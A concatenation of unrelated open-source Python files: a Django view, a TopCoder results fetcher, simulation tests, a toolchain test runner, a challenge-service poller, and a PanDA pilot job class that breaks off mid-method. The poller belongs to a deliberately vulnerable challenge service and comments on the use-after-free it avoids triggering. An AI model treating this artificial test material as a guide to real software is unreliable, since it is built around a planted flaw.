from django.db.models import Q from django.shortcuts import get_object_or_404, redirect from itertools import chain from trix.trix_core.models import Course from trix.trix_course.views import base class CourseAdminView(base.TrixCourseBaseView): model = Course template_name = "trix_course/course_admin.django.html" def get(self, request, **kwargs): self.course = get_object_or_404(Course, id=kwargs['course_id']) return super(CourseAdminView, self).get(request, **kwargs) def get_context_data(self, **kwargs): context = super(CourseAdminView, self).get_context_data(**kwargs) context['course'] = self.course # Check if user is course owner context['owner'] = self.request.user.is_course_owner(self.course) admin_list = self.course.admins.all() search = self.request.GET.get('q') if search: owner = True if search == "owner" else False admin_list = admin_list.filter(Q(email__icontains=search) | Q(owner=owner)) context['admin_list'] = admin_list return context
devilry/trix2
trix/trix_course/views/administer.py
Python
bsd-3-clause
1,137
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import urllib2
import os
import time
from xml.dom.minidom import parseString


def ox(resultText):
    return u'○' if resultText == 'Passed System Test' else u'×'


def getData(row, tagName, text=''):
    cnode = row.getElementsByTagName(tagName)[0].childNodes
    return cnode[0].data if len(cnode) > 0 else text


argv = sys.argv
argc = len(argv)

if argc < 2:
    print 'usage: python %s handle [srmNumber]' % argv[0]
    quit()

name = argv[1]
srm = argv[2] if argc > 2 else ''
# print name

roundListUrl = 'http://www.topcoder.com/tc?module=BasicData&c=dd_round_list'
cacheFile = os.sep.join([os.environ['HOME'], '.topcoder', 'dd_round_list.xml'])
# TODO: when -f is passed, force a fresh download even if the cache file exists
if not os.path.exists(cacheFile) or time.time() - os.stat(cacheFile).st_mtime > 7 * 24 * 60 * 60:
    f = urllib2.urlopen(roundListUrl)
    cfile = open(cacheFile, 'w')
    cfile.write(f.read())
    cfile.close()

f = open(cacheFile, 'r')
dom = parseString(f.read())

roundId = ''
roundName = ''
if srm == '':
    row = dom.getElementsByTagName('row')[-1]
    roundId = getData(row, 'round_id')
    roundName = getData(row, 'short_name')
else:
    for row in dom.getElementsByTagName('row'):
        roundName = getData(row, 'short_name')
        if srm in roundName:
            roundId = getData(row, 'round_id')
            break

if roundId == '':
    print 'invalid srm number'
    quit()

# print roundDataUrl
roundDataUrl = 'http://www.topcoder.com/tc?module=BasicData&c=dd_round_results&rd='+roundId
roundResultFilename = 'dd_round_result.' + roundId + '.xml'
cacheFile = os.sep.join([os.environ['HOME'], '.topcoder', roundResultFilename])
if not os.path.exists(cacheFile):
    f = urllib2.urlopen(roundDataUrl)
    cfile = open(cacheFile, 'w')
    cfile.write(f.read())
    cfile.close()

f = open(cacheFile, 'r')
dom = parseString(f.read())

for row in dom.getElementsByTagName('row'):
    handle = getData(row, 'handle')
    if handle == name:
        print roundName,
        print ox(getData(row, 'level_one_status')),
        print ox(getData(row, 'level_two_status')),
        print ox(getData(row, 'level_three_status')),
        print getData(row, 'challenge_points'),'=',
        print getData(row, 'final_points'),'pts',
        print getData(row,'old_rating'),
        print '->',
        print getData(row, 'new_rating'),
        print

sys.exit(0)
nise-nabe/SRMResultGetter
srm_result.py
Python
bsd-2-clause
2,302
# -*- coding: utf-8 -*- # # This file is part of the VecNet OpenMalaria Portal. # For copyright and licensing information about this package, see the # NOTICE.txt and LICENSE.txt files in its top-level directory; they are # available at https://github.com/vecnet/om # # This Source Code Form is subject to the terms of the Mozilla Public # License (MPL), version 2.0. If a copy of the MPL was not distributed # with this file, You can obtain one at http://mozilla.org/MPL/2.0/. from django.test.testcases import TestCase from website.apps.ts_om.models import Simulation from website.apps.ts_om.tests.factories import ScenarioFactory, get_xml class ScenarioTest(TestCase): def test_demography_property_1(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) self.assertEqual(scenario.demography.name, "Tororo") def test_demography_property_2(self): scenario = ScenarioFactory(xml="xml") self.assertEqual(scenario.demography, "no_name") def test_output_file_property_1(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) self.assertEqual(scenario.output_file, None) def test_output_file_property_2(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) scenario.new_simulation = Simulation.objects.create() scenario.save() self.assertEqual(scenario.output_file, None) def test_output_file_property_3(self): scenario = ScenarioFactory(xml=get_xml("tororo.xml")) scenario.new_simulation = Simulation.objects.create() scenario.save() scenario.new_simulation.set_model_stdout("123") self.assertEqual(scenario.output_file.read(), b"123")
vecnet/om
website/apps/ts_om/tests/models/test_Scenario.py
Python
mpl-2.0
1,702
#!/usr/bin/python # Copyright (c) 2013 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. ''' Installs and runs (a subset of) the gcc toolchain test suite against various nacl and non-nacl toolchains ''' import glob import os import os.path import sys # Hack to get buildbot_lib. Fix by moving scripts around? sys.path.append(os.path.abspath(os.path.join(os.getcwd(),'buildbot'))) import buildbot_lib # Config TEST_SUITE_BASE = os.path.join('toolchain_build', 'src', 'pnacl-gcc', 'gcc', 'testsuite') TEST_PATH_C = os.path.join(TEST_SUITE_BASE, 'gcc.c-torture', 'execute') TEST_PATH_CPP = os.path.join(TEST_SUITE_BASE, 'g++.dg') def usage(): print 'Usage:', sys.argv[0], '<compiler> <platform>', print '[<args for toolchain_tester.py>]' def list_tests(src_base, *glob_path): if not os.path.isdir(src_base): raise Exception('Torture test source directory missing: ' + src_base) glob_pattern = os.path.join(src_base, *glob_path) test_list = glob.glob(glob_pattern) if not test_list: raise Exception('Empty result list from glob pattern: ' + glob_pattern) return test_list def standard_tests(context, config, exclude, extra_args): # TODO: make toolchain_tester.py runnable as a library? command = ['tools/toolchain_tester/toolchain_tester.py', '--exclude=tools/toolchain_tester/' + exclude, '--exclude=tools/toolchain_tester/known_failures_base.txt', '--config=' + config, '--append=CFLAGS:-std=gnu89'] if 'pnacl' in config: command.append('--append_file=tools/toolchain_tester/extra_flags_pnacl.txt') command.extend(extra_args) command.extend(list_tests(TEST_PATH_C, '*c')) command.extend(list_tests(TEST_PATH_C, 'ieee', '*c')) print command try: return buildbot_lib.Command(context, command) except buildbot_lib.StepFailed: return 1 def eh_tests(context, config, exclude, extra_args, use_sjlj_eh): # TODO: toolchain_tester.py runnable as a library? command = ['tools/toolchain_tester/toolchain_tester.py', '--exclude=tools/toolchain_tester/' + exclude, '--exclude=tools/toolchain_tester/unsuitable_dejagnu_tests.txt', '--config=' + config] if 'pnacl' in config: command.append('--append_file=tools/toolchain_tester/extra_flags_pnacl.txt') if use_sjlj_eh: command.append('--append=CFLAGS:--pnacl-exceptions=sjlj') else: command.append('--append=CFLAGS:--pnacl-allow-exceptions') command.append('--append=FINALIZE_FLAGS:--no-finalize') command.append('--append=TRANSLATE_FLAGS:--pnacl-allow-exceptions') command.append('--append=TRANSLATE_FLAGS:--allow-llvm-bitcode-input') command.extend(extra_args) command.extend(list_tests(TEST_PATH_CPP, 'eh', '*.C')) print command try: return buildbot_lib.Command(context, command) except buildbot_lib.StepFailed: return 1 def run_torture(status, compiler, platform, extra_args): if platform not in ('x86-32', 'x86-64', 'arm'): print 'Unknown platform:', platform config_map = { 'pnacl': 'llvm_pnacl', 'naclgcc': 'nacl_gcc', 'localgcc': 'local_gcc', 'clang': 'nacl_clang'} failures = [] if compiler == 'pnacl': # O3_O0 is clang -O3 followed by pnacl-translate -O0 optmodes = ['O0', 'O3', 'O0_O0', 'O3_O0'] if platform == 'x86-32': # Add some extra Subzero configurations. optmodes.extend(['O3_sz', 'O3_O0_sz']) # TODO(stichnot): Consider pruning some configurations if the tests run # too long. else: optmodes = ['O0', 'O3'] for optmode in optmodes: # TODO: support an option like -k? 
For now, always keep going config = '_'.join((config_map[compiler], platform, optmode)) eh_config = ('_'.join((config_map[compiler] + '++', platform, optmode)) if compiler =='clang' else config) # Test zero-cost C++ exception handling. retcode = eh_tests(status.context, eh_config, 'known_eh_failures_' + compiler + '.txt', extra_args, use_sjlj_eh=False) if retcode: failures.append(optmode + ' zerocost eh') # Test SJLJ C++ exception handling. if compiler == 'pnacl': retcode = eh_tests(status.context, eh_config, 'known_eh_failures_' + compiler + '.txt', extra_args, use_sjlj_eh=True) if retcode: failures.append(optmode + ' sjlj eh') # Run the normal (non-exception-handling) tests. retcode = standard_tests( status.context, config, 'known_failures_' + compiler + '.txt', extra_args) if retcode: failures.append(optmode + ' standard') if len(failures) > 0: print 'There were failed steps in modes:', failures return 1 return 0 def main(): context = buildbot_lib.BuildContext() buildbot_lib.SetDefaultContextAttributes(context) context['max_jobs'] = int(os.environ.get('PNACL_CONCURRENCY', 4)) status = buildbot_lib.BuildStatus(context) # TODO(dschuff): it's a pain to pass through unknown arguments with optparse, # but if we add more, or once we have argparse (python2.7) everywhere, switch. try: compiler = sys.argv[1] platform = sys.argv[2] tester_argv = sys.argv[3:] except IndexError: usage() sys.exit(1) return run_torture(status, compiler, platform, tester_argv) if __name__ == '__main__': sys.exit(main())
cohortfsllc/cohort-cocl2-sandbox
tools/toolchain_tester/torture_test.py
Python
bsd-3-clause
5,564
#!/usr/bin/env python # # Copyright (C) 2014 Narf Industries <[email protected]> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY # CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # from generator.actions import Actions from random import choice, randint from os.path import dirname, abspath, join import string import struct import sys sys.path.append(join(dirname(dirname(dirname(abspath(__file__)))), "support")) from support import Support def random_alpha(a, b): return ''.join(choice(string.letters) for _ in range(randint(a, b))) class FalseProfits(Actions): SUCCESS = '\x00' * 4 FAILURE = '\xff' * 4 def start(self): self.state['model'] = Support() self.state['uaf'] = False def cmd(self): pass def list_stocks(self): stocks = self.state['model'].list_stocks() self.write(self.state['model'].make_list_stocks_cmd()) # After UAF, this list will be corrupted, so expect failure if self.state['uaf']: self.read(length=4, expect=self.FAILURE) else: for s in stocks: self.read(delim='\n', expect=s) self.read(length=4, expect=self.SUCCESS) def list_orders(self): pass def list_orders_valid(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = choice(stocks) orders = self.state['model'].list_orders(stock) self.write(self.state['model'].make_list_orders_cmd(stock)) self.read(delim='\n', expect='Order book for %s' % stock) self.read(delim='\n', expect='ID\tSIDE\tQTY\tPRICE\tQTY\tSIDE') for o in orders: self.read(delim='\n', expect=str(o)) self.read(length=4, expect=self.SUCCESS) def list_orders_invalid(self): stocks = self.state['model'].list_stocks() stock = random_alpha(1, 4) while stock in stocks: stock = random_alpha(1, 4) self.write(self.state['model'].make_list_orders_cmd(stock)) self.read(length=4, expect=self.FAILURE) def add_order(self): pass def add_order_existing(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = choice(list(stocks)) price = randint(1, 20) * 100 quantity = randint(1, 100) is_buy = choice((True, False)) order, removed = self.state['model'].place_order(stock, price, quantity, is_buy) self.write(self.state['model'].make_place_order_cmd(stock, price, quantity, is_buy)) self.read(length=4, expect=struct.pack('I', order)) # Prevent hitting UAF by force-allocating new stock, only corrupting one list if removed: self.state['uaf'] = True self.add_order_new() def add_order_new(self): stocks = self.state['model'].list_stocks() stock = random_alpha(1, 4) while stock in stocks: stock = random_alpha(1, 4) price = randint(1, 20) * 100 quantity = randint(1, 100) is_buy = choice((True, False)) order, 
removed = self.state['model'].place_order(stock, price, quantity, is_buy) assert(not removed) self.write(self.state['model'].make_place_order_cmd(stock, price, quantity, is_buy)) self.read(length=4, expect=struct.pack('I', order)) def check_order(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = self.state['model'].stock_dict[choice(stocks)] orders = stock.buy_orders + stock.sell_orders if not orders: return order = choice(orders).id_ self.write(self.state['model'].make_check_order_cmd(order)) self.read(delim='\n', expect=self.state['model'].check_order(order)) self.read(length=4, expect=self.SUCCESS) def cancel_order(self): stocks = self.state['model'].list_stocks() if not stocks: return stock = self.state['model'].stock_dict[choice(stocks)] orders = stock.buy_orders + stock.sell_orders if not orders: return order = choice(orders).id_ removed = self.state['model'].cancel_order(order) self.write(self.state['model'].make_cancel_order_cmd(order)) self.read(length=4, expect=self.SUCCESS) # Prevent hitting UAF by force-allocating new stock if removed: self.state['uaf'] = True self.add_order_new() def finish(self): self.write(self.state['model'].make_quit_cmd())
f0rki/cb-multios
original-challenges/electronictrading/poller/for-release/machine.py
Python
mit
5,603
match x<caret>:
jwren/intellij-community
python/testData/codeInsight/smartEnter/firstClauseAfterEmptyMatchStatementWithSubjectAndColon.py
Python
apache-2.0
15
# Class definition: # RunJob # This is the main RunJob class; RunJobEvent etc will inherit from this class # Note: at the moment, this class is essentially the old runJob module turned object oriented. # The class will later become RunJobNormal, ie responible for running normal PanDA jobs. # At that point a new RunJob top class will be created containing methods that have been # identified as common between the various sub classes. # Instances are generated with RunJobFactory # Subclasses should implement all needed methods prototyped in this class # Note: not compatible with Singleton Design Pattern due to the subclassing # Standard python modules import os, sys, commands, getopt, time import traceback import atexit, signal import stat from optparse import OptionParser # Pilot modules import Site, pUtil, Job, Node, RunJobUtilities import Mover as mover from pUtil import debugInfo, tolog, isAnalysisJob, readpar, createLockFile, getDatasetDict, getChecksumCommand,\ tailPilotErrorDiag, getFileAccessInfo, processDBRelease, getCmtconfig, getExtension, getExperiment, getGUID, dumpFile from JobRecovery import JobRecovery from FileStateClient import updateFileStates, dumpFileStates from ErrorDiagnosis import ErrorDiagnosis # import here to avoid issues seen at BU with missing module from PilotErrors import PilotErrors from ProxyGuard import ProxyGuard from shutil import copy2 from FileHandling import tail # remove logguid, dq2url, debuglevel - not needed # rename lfcRegistration to catalogRegistration # relabelled -h, queuename to -b (debuglevel not used) class RunJob(object): # private data members __runjob = "RunJob" # String defining the RunJob class __instance = None # Boolean used by subclasses to become a Singleton __error = PilotErrors() # PilotErrors object # __appdir = "/usatlas/projects/OSG" # Default software installation directory # __debugLevel = 0 # 0: debug info off, 1: display function name when called, 2: full debug info # __dq2url = "" # REMOVE __failureCode = None # set by signal handler when user/batch system kills the job __globalPilotErrorDiag = "" # global pilotErrorDiag used with signal handler (only) __globalErrorCode = 0 # global error code used with signal handler (only) __inputDir = "" # location of input files (source for mv site mover) __fileCatalogRegistration = True # should the pilot perform file catalog registration? __logguid = None # guid for the log file __outputDir = "" # location of output files (destination for mv site mover) __pilot_initdir = "" # location of where the pilot is untarred and started __pilotlogfilename = "pilotlog.txt" # default pilotlog filename __pilotserver = "localhost" # default server __pilotport = 88888 # default port __proxycheckFlag = True # True (default): perform proxy validity checks, False: no check __pworkdir = "/tmp" # site work dir used by the parent # __queuename = "" # PanDA queue NOT NEEDED # __sitename = "testsite" # PanDA site NOT NEEDED __stageinretry = 1 # number of stage-in tries __stageoutretry = 1 # number of stage-out tries # __testLevel = 0 # test suite control variable (0: no test, 1: put error, 2: ...) NOT USED # __workdir = "/tmp" # NOT USED __cache = "" # Cache URL, e.g. 
used by LSST # Getter and setter methods def getExperiment(self): """ Getter for __experiment """ return self.__experiment def getFailureCode(self): """ Getter for __failureCode """ return self.__failureCode def setFailureCode(self, code): """ Setter for __failureCode """ self.__failureCode = code def getGlobalPilotErrorDiag(self): """ Getter for __globalPilotErrorDiag """ return self.__globalPilotErrorDiag def setGlobalPilotErrorDiag(self, pilotErrorDiag): """ Setter for __globalPilotErrorDiag """ self.__globalPilotErrorDiag = pilotErrorDiag def getGlobalErrorCode(self): """ Getter for __globalErrorCode """ return self.__globalErrorCode def setGlobalErrorCode(self, code): """ Setter for __globalErrorCode """ self.__globalErrorCode = code def setCache(self, cache): """ Setter for __cache """ self.__cache = cache def getInputDir(self): """ Getter for __inputDir """ return self.__inputDir def getFileCatalogRegistration(self): """ Getter for __fileCatalogRegistration """ return self.__fileCatalogRegistration def getLogGUID(self): """ Getter for __logguid """ return self.__logguid def getOutputDir(self): """ Getter for __outputDir """ return self.__outputDir def getPilotInitDir(self): """ Getter for __pilot_initdir """ return self.__pilot_initdir def getPilotLogFilename(self): """ Getter for __pilotlogfilename """ return self.__pilotlogfilename def getPilotServer(self): """ Getter for __pilotserver """ return self.__pilotserver def getPilotPort(self): """ Getter for __pilotport """ return self.__pilotport def getProxyCheckFlag(self): """ Getter for __proxycheckFlag """ return self.__proxycheckFlag def getParentWorkDir(self): """ Getter for __pworkdir """ return self.__pworkdir def getStageInRetry(self): """ Getter for __stageinretry """ return self.__stageinretry def getStageOutRetry(self): """ Getter for __stageoutretry """ return self.__stageoutretry def getCache(self): """ Getter for __cache """ return self.__cache # Required methods def __init__(self): """ Default initialization """ # e.g. self.__errorLabel = errorLabel pass def getRunJob(self): """ Return a string with the module name """ return self.__runjob def argumentParser(self): """ Argument parser for the RunJob module """ # Return variables appdir = None dq2url = None # REMOVE queuename = None sitename = None workdir = None parser = OptionParser() parser.add_option("-a", "--appdir", dest="appdir", help="The local path to the applications directory", metavar="APPDIR") parser.add_option("-b", "--queuename", dest="queuename", help="Queue name", metavar="QUEUENAME") parser.add_option("-d", "--workdir", dest="workdir", help="The local path to the working directory of the payload", metavar="WORKDIR") parser.add_option("-g", "--inputdir", dest="inputDir", help="Location of input files to be transferred by the mv site mover", metavar="INPUTDIR") parser.add_option("-i", "--logfileguid", dest="logguid", help="Log file guid", metavar="GUID") parser.add_option("-k", "--pilotlogfilename", dest="pilotlogfilename", help="The name of the pilot log file", metavar="PILOTLOGFILENAME") parser.add_option("-l", "--pilotinitdir", dest="pilot_initdir", help="The local path to the directory where the pilot was launched", metavar="PILOT_INITDIR") parser.add_option("-m", "--outputdir", dest="outputDir", help="Destination of output files to be transferred by the mv site mover", metavar="OUTPUTDIR") parser.add_option("-o", "--parentworkdir", dest="pworkdir", help="Path to the work directory of the parent process (i.e. 
the pilot)", metavar="PWORKDIR") parser.add_option("-s", "--sitename", dest="sitename", help="The name of the site where the job is to be run", metavar="SITENAME") parser.add_option("-w", "--pilotserver", dest="pilotserver", help="The URL of the pilot TCP server (localhost) WILL BE RETIRED", metavar="PILOTSERVER") parser.add_option("-p", "--pilotport", dest="pilotport", help="Pilot TCP server port (default: 88888)", metavar="PORT") parser.add_option("-t", "--proxycheckflag", dest="proxycheckFlag", help="True (default): perform proxy validity checks, False: no check", metavar="PROXYCHECKFLAG") parser.add_option("-q", "--dq2url", dest="dq2url", help="DQ2 URL TO BE RETIRED", metavar="DQ2URL") parser.add_option("-x", "--stageinretries", dest="stageinretry", help="The number of stage-in retries", metavar="STAGEINRETRY") parser.add_option("-B", "--filecatalogregistration", dest="fileCatalogRegistration", help="True (default): perform file catalog registration, False: no catalog registration", metavar="FILECATALOGREGISTRATION") parser.add_option("-E", "--stageoutretries", dest="stageoutretry", help="The number of stage-out retries", metavar="STAGEOUTRETRY") parser.add_option("-F", "--experiment", dest="experiment", help="Current experiment (default: ATLAS)", metavar="EXPERIMENT") parser.add_option("-H", "--cache", dest="cache", help="Cache URL", metavar="CACHE") # options = {'experiment': 'ATLAS'} try: (options, args) = parser.parse_args() except Exception,e: tolog("!!WARNING!!3333!! Exception caught:" % (e)) print options.experiment else: if options.appdir: # self.__appdir = options.appdir appdir = options.appdir if options.dq2url: # self.__dq2url = options.dq2url dq2url = options.dq2url if options.experiment: self.__experiment = options.experiment if options.logguid: self.__logguid = options.logguid if options.inputDir: self.__inputDir = options.inputDir if options.fileCatalogRegistration: if options.fileCatalogRegistration.lower() == "false": self.__fileCatalogRegistration = False else: self.__fileCatalogRegistration = True else: self.__fileCatalogRegistration = True if options.pilot_initdir: self.__pilot_initdir = options.pilot_initdir if options.pilotlogfilename: self.__pilotlogfilename = options.pilotlogfilename if options.pilotserver: self.__pilotserver = options.pilotserver if options.proxycheckFlag: if options.proxycheckFlag.lower() == "false": self.__proxycheckFlag = False else: self.__proxycheckFlag = True else: self.__proxycheckFlag = True if options.pworkdir: self.__pworkdir = options.pworkdir if options.outputDir: self.__outputDir = options.outputDir if options.pilotport: try: self.__pilotport = int(options.pilotport) except Exception, e: tolog("!!WARNING!!3232!! Exception caught: %s" % (e)) # self.__queuename is not needed if options.queuename: queuename = options.queuename if options.sitename: sitename = options.sitename if options.stageinretry: try: self.__stageinretry = int(options.stageinretry) except Exception, e: tolog("!!WARNING!!3232!! Exception caught: %s" % (e)) if options.stageoutretry: try: self.__stageoutretry = int(options.stageoutretry) except Exception, e: tolog("!!WARNING!!3232!! 
Exception caught: %s" % (e)) if options.workdir: workdir = options.workdir if options.cache: self.__cache = options.cache return sitename, appdir, workdir, dq2url, queuename def getRunJobFileName(self): """ Return the filename of the module """ fullpath = sys.modules[self.__module__].__file__ # Note: the filename above will contain both full path, and might end with .pyc, fix this filename = os.path.basename(fullpath) if filename.endswith(".pyc"): filename = filename[:-1] # remove the trailing 'c' return filename def allowLoopingJobKiller(self): """ Should the pilot search for looping jobs? """ # The pilot has the ability to monitor the payload work directory. If there are no updated files within a certain # time limit, the pilot will consider the as stuck (looping) and will kill it. The looping time limits are set # in environment.py (see e.g. loopingLimitDefaultProd) return True def cleanup(self, job, rf=None): """ Cleanup function """ # 'rf' is a list that will contain the names of the files that could be transferred # In case of transfer problems, all remaining files will be found and moved # to the data directory for later recovery. tolog("********************************************************") tolog(" This job ended with (trf,pilot) exit code of (%d,%d)" % (job.result[1], job.result[2])) tolog("********************************************************") # clean up the pilot wrapper modules pUtil.removePyModules(job.workdir) if os.path.isdir(job.workdir): os.chdir(job.workdir) # remove input files from the job workdir remFiles = job.inFiles for inf in remFiles: if inf and inf != 'NULL' and os.path.isfile("%s/%s" % (job.workdir, inf)): # non-empty string and not NULL try: os.remove("%s/%s" % (job.workdir, inf)) except Exception,e: tolog("!!WARNING!!3000!! Ignore this Exception when deleting file %s: %s" % (inf, str(e))) pass # only remove output files if status is not 'holding' # in which case the files should be saved for the job recovery. # the job itself must also have finished with a zero trf error code # (data will be moved to another directory to keep it out of the log file) # always copy the metadata-<jobId>.xml to the site work dir # WARNING: this metadata file might contain info about files that were not successfully moved to the SE # it will be regenerated by the job recovery for the cases where there are output files in the datadir try: tolog('job.workdir is %s pworkdir is %s ' % (job.workdir, self.__pworkdir)) # Eddie copy2("%s/metadata-%s.xml" % (job.workdir, job.jobId), "%s/metadata-%s.xml" % (self.__pworkdir, job.jobId)) except Exception, e: tolog("Warning: Could not copy metadata-%s.xml to site work dir - ddm Adder problems will occure in case of job recovery" % (job.jobId)) tolog('job.workdir is %s pworkdir is %s ' % (job.workdir, self.__pworkdir)) # Eddie if job.result[0] == 'holding' and job.result[1] == 0: try: # create the data directory os.makedirs(job.datadir) except OSError, e: tolog("!!WARNING!!3000!! Could not create data directory: %s, %s" % (job.datadir, str(e))) else: # find all remaining files in case 'rf' is not empty remaining_files = [] moved_files_list = [] try: if rf != None: moved_files_list = RunJobUtilities.getFileNamesFromString(rf[1]) remaining_files = RunJobUtilities.getRemainingFiles(moved_files_list, job.outFiles) except Exception, e: tolog("!!WARNING!!3000!! 
Illegal return value from Mover: %s, %s" % (str(rf), str(e))) remaining_files = job.outFiles # move all remaining output files to the data directory nr_moved = 0 for _file in remaining_files: try: os.system("mv %s %s" % (_file, job.datadir)) except OSError, e: tolog("!!WARNING!!3000!! Failed to move file %s (abort all)" % (_file)) break else: nr_moved += 1 tolog("Moved %d/%d output file(s) to: %s" % (nr_moved, len(remaining_files), job.datadir)) # remove all successfully copied files from the local directory nr_removed = 0 for _file in moved_files_list: try: os.system("rm %s" % (_file)) except OSError, e: tolog("!!WARNING!!3000!! Failed to remove output file: %s, %s" % (_file, e)) else: nr_removed += 1 tolog("Removed %d output file(s) from local dir" % (nr_removed)) # copy the PoolFileCatalog.xml for non build jobs if not pUtil.isBuildJob(remaining_files): _fname = os.path.join(job.workdir, "PoolFileCatalog.xml") tolog("Copying %s to %s" % (_fname, job.datadir)) try: copy2(_fname, job.datadir) except Exception, e: tolog("!!WARNING!!3000!! Could not copy PoolFileCatalog.xml to data dir - expect ddm Adder problems during job recovery") # remove all remaining output files from the work directory # (a successfully copied file should already have been removed by the Mover) rem = False for inf in job.outFiles: if inf and inf != 'NULL' and os.path.isfile("%s/%s" % (job.workdir, inf)): # non-empty string and not NULL try: os.remove("%s/%s" % (job.workdir, inf)) except Exception,e: tolog("!!WARNING!!3000!! Ignore this Exception when deleting file %s: %s" % (inf, str(e))) pass else: tolog("Lingering output file removed: %s" % (inf)) rem = True if not rem: tolog("All output files already removed from local dir") tolog("Payload cleanup has finished") def sysExit(self, job, rf=None): ''' wrapper around sys.exit rs is the return string from Mover::put containing a list of files that were not transferred ''' self.cleanup(job, rf=rf) sys.stderr.close() tolog("RunJob (payload wrapper) has finished") # change to sys.exit? os._exit(job.result[2]) # pilotExitCode, don't confuse this with the overall pilot exit code, # which doesn't get reported back to panda server anyway def failJob(self, transExitCode, pilotExitCode, job, ins=None, pilotErrorDiag=None, docleanup=True): """ set the fail code and exit """ if pilotExitCode and job.attemptNr < 4 and job.eventServiceMerge: pilotExitCode = PilotErrors.ERR_ESRECOVERABLE job.setState(["failed", transExitCode, pilotExitCode]) if pilotErrorDiag: job.pilotErrorDiag = pilotErrorDiag tolog("Will now update local pilot TCP server") rt = RunJobUtilities.updatePilotServer(job, self.__pilotserver, self.__pilotport, final=True) if ins: ec = pUtil.removeFiles(job.workdir, ins) if docleanup: self.sysExit(job) def isMultiTrf(self, parameterList): """ Will we execute multiple jobs? 
""" if len(parameterList) > 1: multi_trf = True else: multi_trf = False return multi_trf def setup(self, job, jobSite, thisExperiment): """ prepare the setup and get the run command list """ # start setup time counter t0 = time.time() ec = 0 runCommandList = [] # split up the job parameters to be able to loop over the tasks jobParameterList = job.jobPars.split("\n") jobHomePackageList = job.homePackage.split("\n") jobTrfList = job.trf.split("\n") job.release = thisExperiment.formatReleaseString(job.release) releaseList = thisExperiment.getRelease(job.release) tolog("Number of transformations to process: %s" % len(jobParameterList)) multi_trf = self.isMultiTrf(jobParameterList) # verify that the multi-trf job is setup properly ec, job.pilotErrorDiag, releaseList = RunJobUtilities.verifyMultiTrf(jobParameterList, jobHomePackageList, jobTrfList, releaseList) if ec > 0: return ec, runCommandList, job, multi_trf os.chdir(jobSite.workdir) tolog("Current job workdir is %s" % os.getcwd()) # setup the trf(s) _i = 0 _stdout = job.stdout _stderr = job.stderr _first = True for (_jobPars, _homepackage, _trf, _swRelease) in map(None, jobParameterList, jobHomePackageList, jobTrfList, releaseList): tolog("Preparing setup %d/%d" % (_i + 1, len(jobParameterList))) # reset variables job.jobPars = _jobPars job.homePackage = _homepackage job.trf = _trf job.release = _swRelease if multi_trf: job.stdout = _stdout.replace(".txt", "_%d.txt" % (_i + 1)) job.stderr = _stderr.replace(".txt", "_%d.txt" % (_i + 1)) # post process copysetup variable in case of directIn/useFileStager _copysetup = readpar('copysetup') _copysetupin = readpar('copysetupin') if "--directIn" in job.jobPars or "--useFileStager" in job.jobPars or _copysetup.count('^') == 5 or _copysetupin.count('^') == 5: # only need to update the queuedata file once if _first: RunJobUtilities.updateCopysetups(job.jobPars) _first = False # setup the trf ec, job.pilotErrorDiag, cmd, job.spsetup, job.JEM, job.cmtconfig = thisExperiment.getJobExecutionCommand(job, jobSite, self.__pilot_initdir) if ec > 0: # setup failed break # add the setup command to the command list runCommandList.append(cmd) _i += 1 job.stdout = _stdout job.stderr = _stderr job.timeSetup = int(time.time() - t0) tolog("Total setup time: %d s" % (job.timeSetup)) return ec, runCommandList, job, multi_trf def stageIn(self, job, jobSite, analysisJob, pfc_name="PoolFileCatalog.xml"): """ Perform the stage-in """ ec = 0 statusPFCTurl = None usedFAXandDirectIO = False # Prepare the input files (remove non-valid names) if there are any ins, job.filesizeIn, job.checksumIn = RunJobUtilities.prepareInFiles(job.inFiles, job.filesizeIn, job.checksumIn) if ins: tolog("Preparing for get command") # Get the file access info (only useCT is needed here) useCT, oldPrefix, newPrefix, useFileStager, directIn = getFileAccessInfo() # Transfer input files tin_0 = os.times() ec, job.pilotErrorDiag, statusPFCTurl, FAX_dictionary = \ mover.get_data(job, jobSite, ins, self.__stageinretry, analysisJob=analysisJob, usect=useCT,\ pinitdir=self.__pilot_initdir, proxycheck=False, inputDir=self.__inputDir, workDir=self.__pworkdir, pfc_name=pfc_name) if ec != 0: job.result[2] = ec tin_1 = os.times() job.timeStageIn = int(round(tin_1[4] - tin_0[4])) # Extract any FAX info from the dictionary if FAX_dictionary.has_key('N_filesWithoutFAX'): job.filesWithoutFAX = FAX_dictionary['N_filesWithoutFAX'] if FAX_dictionary.has_key('N_filesWithFAX'): job.filesWithFAX = FAX_dictionary['N_filesWithFAX'] if 
